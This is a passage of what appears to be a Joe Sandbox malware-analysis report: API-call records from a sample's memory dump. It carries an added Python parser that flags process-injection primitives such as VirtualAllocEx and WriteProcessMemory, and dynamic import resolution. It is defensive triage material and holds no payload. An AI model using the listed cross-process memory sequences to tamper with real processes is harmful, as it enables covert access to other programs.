                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: BuffCharUpper$__itow__swprintf
                                            • String ID: REMOVE$THIS
                                            • API String ID: 3797816924-776492005
                                            • Opcode ID: 828d6fa840da2e7a9d0dc8a2a6102ad39e443001a5a918e5f5fcfcae3637fc3a
                                            • Instruction ID: fc96b87fed5295aa3376059f2dc8fc37a857414c525402bfc9e3c3075a5492c0
                                            • Opcode Fuzzy Hash: 828d6fa840da2e7a9d0dc8a2a6102ad39e443001a5a918e5f5fcfcae3637fc3a
                                            • Instruction Fuzzy Hash: 8A417F74A0020D9FCF00DFA8C881AADB7B5FF49314F149059E956EB3A2DB309D46CB51
                                            APIs
                                              • Part of subcall function 0084430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0083BC08,?,?,00000034,00000800,?,00000034), ref: 00844335
                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0083C1D3
                                              • Part of subcall function 008442D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0083BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00844300
                                              • Part of subcall function 0084422F: GetWindowThreadProcessId.USER32(?,?), ref: 0084425A
                                              • Part of subcall function 0084422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0083BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0084426A
                                              • Part of subcall function 0084422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0083BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00844280
                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0083C240
                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0083C28D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                            • String ID: @
                                            • API String ID: 4150878124-2766056989
                                            • Opcode ID: 07afa3e7729b701ee4451f141e40924c569db08b58b84cb342fb9f782c2d6c0b
                                            • Instruction ID: 4419da17137db8689d60fd69962642c76d11e01709bd757b761b77ad8c97248e
                                            • Opcode Fuzzy Hash: 07afa3e7729b701ee4451f141e40924c569db08b58b84cb342fb9f782c2d6c0b
                                            • Instruction Fuzzy Hash: 5C41187290021CAEDB11DFA8CD81EEEB7B8FB59700F004195FA55B7181DAB16E45CBA1
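The record above is the one that carries the report's cross-process memory primitives: OpenProcess, VirtualAllocEx and WriteProcessMemory/ReadProcessMemory chained behind SendMessageW, with 0x1004 (LVM_GETITEMCOUNT) and 0x1073 (LVM_GETITEMTEXTW) visible in the call arguments. That is the sequence a GUI-automation runtime uses to read another process's list-view items, so this block on its own is weaker evidence of code injection than the thread-context and APC findings listed in the summary. Pulling such records out of a listing thousands of lines long by eye is error-prone, so the following added example (my own Python, not Joe Sandbox's code and not taken from the sample) parses this report's function-block layout into records and tags two patterns: the VirtualAllocEx + WriteProcessMemory cluster seen here, and the LoadLibrary + GetProcAddress blocks further down that resolve RoInitialize, RoUninitialize, Wow64RevertWow64FsRedirection, Wow64DisableWow64FsRedirection and GetProcessId by name. The SAMPLE excerpt is constructed from records on this page; the field names, tag names and rule sets are my assumptions.

```python
"""Triage helper for the Joe Sandbox function-block records above (added example,
not Joe Sandbox code). Parses the APIs / Strings / Memory Dump Source / Similarity
layout and flags two API patterns; field, tag and rule names are my own.
SAMPLE is a constructed excerpt: two records copied from this page, with the
Associated and Opcode/Instruction ID lines dropped for brevity."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

SAMPLE = """\
APIs
  • Part of subcall function 0084430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0083BC08,?,?,00000034,00000800,?,00000034), ref: 00844335
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0083C1D3
  • Part of subcall function 008442D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0083BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00844300
  • Part of subcall function 0084422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0083BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0084426A
  • Part of subcall function 0084422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0083BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00844280
Strings
Memory Dump Source
• Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
Similarity
• API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
• String ID: @
• Instruction Fuzzy Hash: 5C41187290021CAEDB11DFA8CD81EEEB7B8FB59700F004195FA55B7181DAB16E45CBA1
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,00000000,008042EC,?,008042AA,?), ref: 00804304
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00804316
Strings
Memory Dump Source
• Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
Similarity
• API ID: AddressLibraryLoadProc
• String ID: Wow64RevertWow64FsRedirection$kernel32.dll
• Instruction Fuzzy Hash: BED0A774440712AFC7205F25EC0CA45B7D4FF04701B019419E552D23F0D7B4C8808710
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "• [Part of subcall function XXXXXXXX: ]Name.MODULE[(args),] ref: XXXXXXXX"
API_CALL = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\),)?\s*ref:\s*(?P<ref>[0-9A-F]{8})")
FIELD = re.compile(r"^•\s*(?P<key>[^:]+?):\s*(?P<value>.*)$")  # "• Key: value"
INJECTION_PRIMITIVES = {"OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "ReadProcessMemory"}
LOADERS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"}

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str                       # call-site address in the dump
    subcall: Optional[str] = None  # callee address when listed as "Part of subcall"

@dataclass
class Block:
    apis: List[ApiCall] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)  # "• Key: value" lines

def parse_blocks(text: str) -> List[Block]:
    """One Block per 'APIs' header; bullets are routed by the section they sit in."""
    blocks, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTION_HEADERS:
            section = line
            if line == "APIs":
                blocks.append(Block())
            continue
        if not blocks or not line.startswith("•"):
            continue  # blank lines and page residue
        if section == "APIs":
            m = API_CALL.match(line)
            if m:
                args = m["args"].split(",") if m["args"] else []
                blocks[-1].apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
        elif section != "Strings":  # Strings sections are empty in this report
            m = FIELD.match(line)
            if m:
                blocks[-1].fields[m["key"]] = m["value"]
    return blocks

def classify(block: Block) -> dict:
    """Tag one record; the fuzzy hash is kept so hits can be pivoted across samples."""
    names = {c.name for c in block.apis}
    tags, resolved, modules = [], [], []
    if {"VirtualAllocEx", "WriteProcessMemory"} <= names:
        tags.append("cross-process-memory")
    if "GetProcAddress" in names and LOADERS & names:
        tags.append("dynamic-import-resolution")
        # String ID lists the block's literals as "Import$module.dll"
        for s in filter(None, block.fields.get("String ID", "").split("$")):
            (modules if s.lower().endswith(".dll") else resolved).append(s)
    return {"ref": block.apis[0].ref if block.apis else None, "tags": tags,
            "primitives": sorted(INJECTION_PRIMITIVES & names),
            "resolved_imports": resolved, "modules_loaded": modules,
            "instruction_fuzzy_hash": block.fields.get("Instruction Fuzzy Hash")}

if __name__ == "__main__":
    for r in map(classify, parse_blocks(SAMPLE)):
        print(r["ref"], r["tags"], r["primitives"] or r["resolved_imports"])
```

To run it over the whole listing, save the report text to a file and feed its contents to `parse_blocks`; records whose `tags` list is empty can be skipped, and the `instruction_fuzzy_hash` of each hit is the value to search for in other reports when checking whether the same runtime routine turns up in related samples.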
                                            APIs
                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0089DC00,00000000,?,?,?,?), ref: 0086A6D8
                                            • GetWindowLongW.USER32 ref: 0086A6F5
                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0086A705
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Window$Long
                                            • String ID: SysTreeView32
                                            • API String ID: 847901565-1698111956
                                            • Opcode ID: f8ef20613472f6421cbd8a5fa80f4d521a260942fa6193a1f1fddf2b0f3f9259
                                            • Instruction ID: 35b2caa7963ca52f3f38dcff4cc46d4ee77995fc830b225f2e773c5898d634f1
                                            • Opcode Fuzzy Hash: f8ef20613472f6421cbd8a5fa80f4d521a260942fa6193a1f1fddf2b0f3f9259
                                            • Instruction Fuzzy Hash: 7C31AD3120020AABDB258E78CC45FEA7BA9FF59324F254719F8B5E22E1D730E8508B51
                                            APIs
                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0086A15E
                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0086A172
                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 0086A196
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window
                                            • String ID: SysMonthCal32
                                            • API String ID: 2326795674-1439706946
                                            • Opcode ID: 51423e54a6fbd7145d8567bed7676f5b65c900af6d4c57f6e9ea211d6f5e4e48
                                            • Instruction ID: c6f3bf0bd285cb14938b466e145a61d3ca49be59908900b65197c2d60f7088d9
                                            • Opcode Fuzzy Hash: 51423e54a6fbd7145d8567bed7676f5b65c900af6d4c57f6e9ea211d6f5e4e48
                                            • Instruction Fuzzy Hash: DC218D32510218ABDF158F94CC82FEA3B79FF49714F110214FA56BB1D0D6B5A8518B90
                                            APIs
                                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0086A941
                                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0086A94F
                                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0086A956
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend$DestroyWindow
                                            • String ID: msctls_updown32
                                            • API String ID: 4014797782-2298589950
                                            • Opcode ID: f26538d270a8c97b86d168495088f311ef4521bef1a8415a9b8e437a27041c21
                                            • Instruction ID: 5e6a719de1a6d2517d07287879dce39366484f4ef17021193268a8bf6e38ac54
                                            • Opcode Fuzzy Hash: f26538d270a8c97b86d168495088f311ef4521bef1a8415a9b8e437a27041c21
                                            • Instruction Fuzzy Hash: 97219FB5200209AFDB15DF58CC81D6737ADFF5A364B150059FA14EB3A2DB31EC118B61
                                            APIs
                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00869A30
                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00869A40
                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00869A65
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend$MoveWindow
                                            • String ID: Listbox
                                            • API String ID: 3315199576-2633736733
                                            • Opcode ID: f852441cb1eb74b0fb39c379e334381d5b386a9330b5839520b0e8c04d3f507f
                                            • Instruction ID: 53efc5d18821730786d3fb8207dd89cf9dde1986eea71806c3990a78785c1d6c
                                            • Opcode Fuzzy Hash: f852441cb1eb74b0fb39c379e334381d5b386a9330b5839520b0e8c04d3f507f
                                            • Instruction Fuzzy Hash: 53217172610118BFDF118F54DC85EBB3BAEFF89764F128129F9949B1D0C6719C5187A0
                                            APIs
                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0086A46D
                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0086A482
                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0086A48F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID: msctls_trackbar32
                                            • API String ID: 3850602802-1010561917
                                            • Opcode ID: 9258fed068d0ab282e1ef63728fe8495b098ed5fddafde65cf4df3facd90e7a9
                                            • Instruction ID: bb03f707d8b6a0b98b452d64bc81323ea6f19a247ac636afecf233ab94ef4440
                                            • Opcode Fuzzy Hash: 9258fed068d0ab282e1ef63728fe8495b098ed5fddafde65cf4df3facd90e7a9
                                            • Instruction Fuzzy Hash: D211C471200208BAEF245F64CC49FAB3769FF89754F024118FA45E6191D6B2E811CB24
                                            APIs
                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00822350,?), ref: 008222A1
                                            • GetProcAddress.KERNEL32(00000000), ref: 008222A8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: RoInitialize$combase.dll
                                            • API String ID: 2574300362-340411864
                                            • Opcode ID: f9f1c21b9a32cf53405279bfcc46f5bffac4b47bfda3e6f48fe66ed58e8e9034
                                            • Instruction ID: 75e06b112db030548bd8555e0f30f567698a8316622876c4f4c54ebbefd75171
                                            • Opcode Fuzzy Hash: f9f1c21b9a32cf53405279bfcc46f5bffac4b47bfda3e6f48fe66ed58e8e9034
                                            • Instruction Fuzzy Hash: 7CE01270A90310EBDB206F74EC8EF18BB64FB00B42F104021B102E61F0CBB99481CF04
                                            APIs
                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00822276), ref: 00822376
                                            • GetProcAddress.KERNEL32(00000000), ref: 0082237D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: RoUninitialize$combase.dll
                                            • API String ID: 2574300362-2819208100
                                            • Opcode ID: 1fe85138a48c951ec389831b702a14ad1f7b39db763f9104ed5973e00094ee0d
                                            • Instruction ID: c79136531deec438beb4ca75727dbece2af7c93072ff422770eb7b1aa7ad2da6
                                            • Opcode Fuzzy Hash: 1fe85138a48c951ec389831b702a14ad1f7b39db763f9104ed5973e00094ee0d
                                            • Instruction Fuzzy Hash: 6CE09970684304EFDA24AFA1AD4DF047BB4BB00B42F140425F109EA2F0CBB8A8408F14
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: LocalTime__swprintf
                                            • String ID: %.3d$WIN_XPe
                                            • API String ID: 2070861257-2409531811
                                            • Opcode ID: 91390196bfc79ae57d4b98648a4c61c2215f40765c31a7dc05cf37a4d1525a02
                                            • Instruction ID: 4aff4a28cc49dd96d98880d68abe291784a14fd95ccd74c7ed3816cb4630db0a
                                            • Opcode Fuzzy Hash: 91390196bfc79ae57d4b98648a4c61c2215f40765c31a7dc05cf37a4d1525a02
                                            • Instruction Fuzzy Hash: 88E0EC7180462CABCA5A97509D45DFD73BCFBC4745F104092B90AE1108D635DB84AB13
                                            APIs
                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000000,008042EC,?,008042AA,?), ref: 00804304
                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00804316
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                            • API String ID: 2574300362-1355242751
                                            • Opcode ID: 236ce3414766907e643b4c5987992a55883da10465271170586a5ce2bf57ac89
                                            • Instruction ID: 5f93758d4920518fb5ef7daf67cd4a9e10b56dcc1e37feaea7628b56a6f7cf0e
                                            • Opcode Fuzzy Hash: 236ce3414766907e643b4c5987992a55883da10465271170586a5ce2bf57ac89
                                            • Instruction Fuzzy Hash: BED0A774440712AFC7205F25EC0CA45B7D4FF04701B019419E552D23F0D7B4C8808710
                                            APIs
                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,008621FB,?,008623EF), ref: 00862213
                                            • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00862225
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: GetProcessId$kernel32.dll
                                            • API String ID: 2574300362-399901964
                                            • Opcode ID: c70d41c01ab4743fbc16eb28ac5bf99b4bfcdf4a1ea09f53f0f7cbbe2938c4fc
                                            • Instruction ID: aa07b6457d30261acb7178ab908e9b3d57d589fa7063a12ee546b5c3a393e3af
                                            • Opcode Fuzzy Hash: c70d41c01ab4743fbc16eb28ac5bf99b4bfcdf4a1ea09f53f0f7cbbe2938c4fc
                                            • Instruction Fuzzy Hash: F3D0A738400B129FC7315F35F80D642F7D4FF04700B018459E862E2390D774D8808760
                                            APIs
                                            • LoadLibraryA.KERNEL32(kernel32.dll,008041BB,00804341,?,0080422F,?,008041BB,?,?,?,?,008039FE,?,00000001), ref: 00804359
                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0080436B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                            • API String ID: 2574300362-3689287502
                                            • Opcode ID: 5768a7620851f3022c7e2b7899add6bb7de4b750ace7db03d728662e12caba45
                                            • Instruction ID: fd37268da90b93284f8e9bd22d0a16e6429341949c7c11b9161ed3132de41fd2
                                            • Opcode Fuzzy Hash: 5768a7620851f3022c7e2b7899add6bb7de4b750ace7db03d728662e12caba45
                                            • Instruction Fuzzy Hash: AFD0A774540713AFC7305F35EC0CA41B7D4FF10719B119419E491D23D0D7B4D8808710
                                            APIs
                                            • LoadLibraryA.KERNEL32(oleaut32.dll,?,0084051D,?,008405FE), ref: 00840547
                                            • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00840559
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: RegisterTypeLibForUser$oleaut32.dll
                                            • API String ID: 2574300362-1071820185
                                            • Opcode ID: f59e4ebf2c02974844ef0a88cd3f2ed28690c642374fd1b9b9f6f73ffb2f0a98
                                            • Instruction ID: d8ee2b46230d67b61542f496d3a4e209f92508b9e9fecdd5d0b1b81d83a71a37
                                            • Opcode Fuzzy Hash: f59e4ebf2c02974844ef0a88cd3f2ed28690c642374fd1b9b9f6f73ffb2f0a98
                                            • Instruction Fuzzy Hash: ECD0C774944B169FD7309F65F84C652B7E4FF14711B51C81DE55AE2390DA74CC808F50
                                            APIs
                                            • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0084052F,?,008406D7), ref: 00840572
                                            • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00840584
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                            • API String ID: 2574300362-1587604923
                                            • Opcode ID: 30468a8ff42d013e88d39edebd92a57e9fbcae7a1bdeba3f4334930383859e49
                                            • Instruction ID: d03d278740441a142fc65e2466ad6c5c769dfae06e08a3b1a3cf7ec8554f2160
